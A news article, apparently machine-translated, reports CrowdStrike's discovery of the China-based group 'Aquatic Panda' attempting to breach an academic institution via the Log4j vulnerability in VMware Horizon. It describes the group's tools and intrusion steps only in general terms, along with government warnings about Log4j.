Cyber security firm Crowdstrike has discovered an attempted infiltration of an academic institution by a China-based group, via the Log4J vulnerability.
Crowdstrike dubbed the group “Aquatic Panda” and said it is a “group with a dual mission of intelligence gathering and industrial espionage” that has been operating since at least May 2020.
The exact purpose of the group is unknown as the attack was halted, but Crowdstrike told ZDNet that Aquatic Panda is known to use tools that allow it to maintain itself in environments in order to gain access to intellectual property and other industrial trade secrets.
“Aquatic Panda’s operations have mainly focused on entities in the telecommunications, technology and government sectors. Aquatic Panda relies heavily on Cobalt Strike, and its toolkit includes a unique, well-known Cobalt Strike loader. under the name FishMaster. Aquatic Panda has also been observed delivering njRAT malware to targets, ”the company said in a report.
According to Crowdstrike, their team discovered “suspicious activity originating from a Tomcat process running under a vulnerable VMWare Horizon instance at a large academic institution, which led to the termination of an active intrusion.”
Log4Shell integrated into the set
After observing the group and reviewing the telemetry data, CrowdStrike believes that a modified version of the Log4j exploit was likely used during the malicious group’s operations.
The Crowdstrike team found that the group used a public GitHub project dated December 13, 2021 to access the vulnerable instance of VMWare Horizon.
“Aquatic Panda continued to reconnect from the host, using native operating system binaries to understand current privilege levels as well as system and domain details.” OverWatch analysts also observed an attempt to discover and stop a third-party Endpoint Discovery and Response (EDR) service. OverWatch continued to track the malicious behavior of the malicious actor, who downloaded additional scripts and then executed a Base64-encoded command through PowerShell to retrieve malware in its toolkit, ”the company explains.
“Throughout the intrusion, OverWatch closely monitored the attacker’s activity in order to provide ongoing updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization has was able to quickly implement its incident response protocol, which ultimately corrected the vulnerable application and prevented further activity by the attacker on the host. ”
Crowdstrike officials told ZDNet they see different groups inside and outside of China taking advantage of the Log4J vulnerability, with adversaries ranging from advanced cyber espionage groups to more mainstream cybercrime groups.
“Ultimately, the viability of this exploit is well proven, with a substantial attack surface still present. We will continue to see actors use this vulnerability until all recommended mitigation measures are in place. “they said in an interview.
Vulnerabilities not to be taken lightly
Last week, the US, UK, Australia and other countries posted an advisory on Log4J in response to “active and global exploitation by numerous malicious actors.”
Numerous groups in North Korea, Iran, Turkey and China have been seen exploiting the vulnerability with a series of ransomware.
According to Jen Easterly, director of the US cybersecurity agency, vulnerabilities in Log4j pose a serious and ongoing threat to organizations and governments around the world.
“We implore all entities to take immediate action to implement the latest guidelines to protect their networks,” Easterly said. “These vulnerabilities are the most severe I have seen in my career, and it is imperative that we work together to keep our networks secure.”
(function(d, s, id) var js, fjs = d.getElementsByTagName(s); if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/fr_FR/all.js#appId=243265768935&xfbml=1"; fjs.parentNode.insertBefore(js, fjs); (document, 'script', 'facebook-jssdk'));